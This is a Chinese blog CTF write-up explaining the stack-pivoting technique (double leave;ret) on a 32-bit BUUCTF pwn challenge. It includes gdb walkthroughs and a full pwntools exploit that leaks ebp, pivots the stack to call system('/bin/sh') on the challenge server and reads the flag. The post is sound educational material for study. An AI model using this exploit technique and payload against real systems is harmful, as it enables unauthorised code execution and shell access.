PWN-栈迁移

最新推荐文章于 2024-06-20 11:07:23 发布
最新推荐文章于 2024-06-20 11:07:23 发布
阅读量800 收藏 16
点赞数 18
分类专栏: pwn 文章标签: pwn 栈迁移 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/139380660
版权

栈迁移

题目:BUUCTF在线评测 (buuoj.cn)

知识点:栈迁移

  1. 使用情况:题目中有栈溢出,但是 栈溢出的范围 有限,导致构造的ROP链不能完全写入到栈中,此时需要进行栈迁移,将栈迁移到能接受更多数据的位置(改变相继sp、bp寄存器的值),位函数调用、传参构造一个新的栈空间。

  2. 函数调用时,无论传参、存bp值还是存返回值都是用栈完成(以32位为例),在普通的栈溢出情况下构造ROP也无非是重新为函数的调用构造了一个 新栈 ,而 栈的位置由sp寄存器 的值确定。

  3. 要改变sp、bp寄存器,拿必定不能使用程序原先在栈上保存的bp寄存器值,所以要将其 覆盖掉 ,如何改变sp和bp即为栈迁移的关键。

  4. 改变sp、bp的关键在于函数退出时的 leave;ret -> mov sp,bp;popbp 指令,这组指令通常是被用来恢复函数的调用的栈帧,时程序返回后仍能正常运行,其与函数开头的 push;mov指令(用来生成栈帧)相反,先看这篇了解栈帧的相关知识 PWN入门–栈溢出_pwn栈溢出-CSDN博客

    image-20240601192020502

    image-20240601192244862

  5. 改变sp、bp需要用到 两层leave;ret 指令,将我们用来覆盖的值传递给sp寄存器,因为一层leave;ret 指令只能将bp寄存器的值改变,无法改变sp寄存器(原因:利用栈溢出无法在 mov sp,bp 指令前直接修改bp寄存器),但是第二层leave;ret 可以借助第一次修改的bp寄存器值来更新sp寄存器。因此,可以用 覆盖值 (覆盖掉bp寄存器指向的栈空间上的值)来更新sp寄存器。

    • 以该例题为例子进行调试:

    • 进入vul函数时,栈上的状态:

      image-20240601211007396

      image-20240601211509331

    • 可见bp寄存器中存储着地址 0xffffcfd8(调用者的sp寄存器值),bp所指向的栈空间上的值为 0xffffcfe8 (调用者的sp寄存器值,指向栈低)。

    • 此时输入0x30个字符来覆盖bp和其下面的返回值:

      image-20240601211355099

    • 可见bp寄存器指向的栈空间已经被覆盖(数据随便输入,仅实验用),后面的函数返回地址也被修改,此时执行最后的 leave;ret 指令,观寄存器的变化,可见bp寄存器的值已经被我们用来覆盖的值替换了,但是sp寄存器的值任然正常(因为push bp和ret,导致sp寄存器在原bp寄存器的基础上+8):

      image-20240601211836403

    • 此时如果将返回值替换为一组 leave;ret地址,修改ip值,再执行一次leave,那么sp寄存器将变化为 bp寄存器中的值+4 ,于是完成栈迁移过程,所以 新的返回值 就在 (bp)+4地址处,执行ret指令即可改变ip为该返回值,调用该处函数:

    • 第一次 leave;ret

      image-20240601212358780

    • 第二次 leave;ret

      image-20240601212410397

题解:

  1. vul函数中read函数值给了0x30个输入空间,只能覆盖到函数的返回值处(前面调试过),虽然存在后门函数hack,但是其参数不是 /bin/sh,在构造ROP时需要修改参数,者导致ROP链的长度超过了read的读取范围,一次考虑栈迁移:

    image-20240601213220865

    image-20240601213234098

  2. 栈迁移的位置因考虑在read的读取范围之内,首先应该考虑栈迁移的目标位置target,直接选择输入s的首地址即可,在 bp-0x38 处,所以首先需要 泄漏数bp处栈上 的值:

    image-20240601215613932

  3. printf函数将s以字符串的形式输出,遇到空白符才终止,所以只要将分配给s的空间全部填满即可泄漏bp处的地址,gbd调试如下:

    image-20240601220413055

    image-20240601220503921

  4. 迁移完成后,ret的返回值就在bp-0x38+4处,调用后函数的返回值就在bp-0x38+4+4(随便填),传递的 参数的地址 (参数“/bin/sh”需要手动写入,地址需要手动计算相对于bp的偏移bp-0x38+4+4+4+4)就放在bp-0x38+4+4+4,“/bin/sh”放在地址 bp-0x38+4+4+4+4 处。

  5. EXP如下:

    from pwn import *
# from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

p=remote('node5.buuoj.cn',28101)
flag = []
sys_addr = 0x08048400
leave_ret = 0x08048562
p.recvuntil("Welcome, my friend. What's your name?\n")

#先泄漏出ebp地址,printf以字符串形式输出s,直到遇到空白符停止,所以可以泄漏ebp的值
payload1= 0x20*b"a"+b"b"*0x8
p.send(payload1)
p.recvuntil("b"*0x8)
ebp_addr=u32(p.recv(4))
log.success('ebp==>'+hex(ebp_addr))

#进行栈迁移
payload2 = (b"aaaa"+p32(sys_addr)+p32(0)+p32(ebp_addr-0x28)+b'/bin/sh').ljust(0x28,b'\x00')+p32(ebp_addr-0x38) + p32(leave_ret)
p.send(payload2)
p.recvuntil(b'Hello, aaaa\n')
p.sendline(b'cat flag')

flag.append(p.recv().decode()[0:len(flag)-1])
p.interactive()

print(flag)

    image-20240601221641973

波克比QWQ
关注
  • 18
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn--迁移
weixin_44642009的博客
04-17 945
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
pwn --迁移
zszcr的博客
04-07 6974
迁移主要是为了解决溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
pwn-迁移-ROP
leeham的博客
08-23 4004
# 迁移-ROP 题目描述 这里给出题目链接 https://github.com/LeeHaming/CTF-learn/blob/master/easyR0p/easyR0p 程序的结构很简单,main()函数中有一个while(1)的循环,循环中rop()函数执行。 rop()中有明显的溢出,最开始给s申请的内存空间为:0x40;然而read()可以读入0x50字节。 于是就...
[Black Watch 入群题]PWN-迁移
个人笔记
04-20 349
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。迁移操作:构造好中ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 644
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
CTF-PWN迁移
m0_53921051的博客
04-05 837
帧介绍 C语言函数调用帧_大佬菜菜带带的博客-CSDN博客 迁移背景 在溢出构造rop链时,有时我们会遇到构造空间不够的情况。比如我们需要构造0x30字节的数据,而read()只能读入0x28字节。但是我们可以控制ebp及ret的值,此时可以利用迁移的方法拓展空间。 迁移条件 能够控制rbp及ret的值。 拥有一块可执行的内存,并且可以连续两次控制该内存。 迁移原理 在函数调用完返回时,会执行leave,ret两条汇编指令。 leave: mov esp ebp; pop
PWN——迁移
L2329794714的博客
08-29 1490
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
pwn——迁移
m0_64195960的博客
07-13 344
迁移的基础知识,例题看完也能有所收获
CTFpwn入门06--迁移学习
2301_79880074的博客
03-03 587
迁移主要应用于我们所构造的payload字节数过多,导致程序无法完全读入中达到我们想要的效果。先通过一篇文章学习一下迁移的基础知识。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
pwn-200题目文件
02-16
pwn-200题目文件
随心笔记,第六更
leen的博客
06-13 566
今天给大家分享的是使用idea 将xml转为JavaBean,并且取其中的数据和其他的数据进行交互。
论文阅读笔记:DepGraph: Towards Any Structural Pruning
HollowKnightz的博客
06-15 1506
论文阅读笔记:DepGraph: Towards Any Structural Pruning
libspice源文件笔记
cai742925624的专栏
06-18 130
libspice源文件笔记
【Java学习笔记】异常处理
最新发布
diguangxihua的博客
06-20 650
除了Java中提供的一些异常类,还可以根据自己的需求定义异常类。//声明UserOwnException无参数构造方法//声明UserOwnException带有String类型参数的构造方法super();//调用父类的构造方法try {execute();//调用execute()方法try {//抛出异常//捕获Exception类//捕获后,直接抛出用户自定义异常类throw new UserOwnException("自定义异常抛出"+e.getMessage())
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值